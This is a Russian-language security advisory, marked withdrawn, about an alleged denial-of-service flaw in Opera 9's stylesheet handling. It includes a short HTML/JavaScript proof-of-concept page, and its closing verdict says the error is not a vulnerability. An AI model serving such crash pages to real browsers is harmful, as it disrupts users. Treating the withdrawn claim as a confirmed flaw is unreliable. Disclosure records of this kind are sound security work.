Отозвано: Отказ в обслуживании в Opera
| Дата публикации: | 04.07.2006 |
| Дата изменения: | 06.04.2009 |
| Всего просмотров: | 4800 |
| Опасность: | Низкая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Opera 9, возможно более ранние версии.
Описание: Уязвимость существует из-за ошибки при обработке каскадных стилей. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать отказ в обслуживании браузера. Пример:
<!-- Opera 9 DOS exploit, discovered by
Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id)
http://y3d1ps.blogspot.com
//-->
<html>
<iframe src="palsu.php" name="fake" ></iframe>
<script type="text/javascript">
function mystyle() {
if (fake.document.styleSheets.length == 1 )
{
f = document.forms["basicstyle"].elements;
for (j = 0; j < f.length; j++)
{
if (f[j].name == 'fsmain');
}
}
}
mystyle();
</script>
</html>
URL производителя: www.opera.com Решение: Данная ошибка не является уязвимостью. |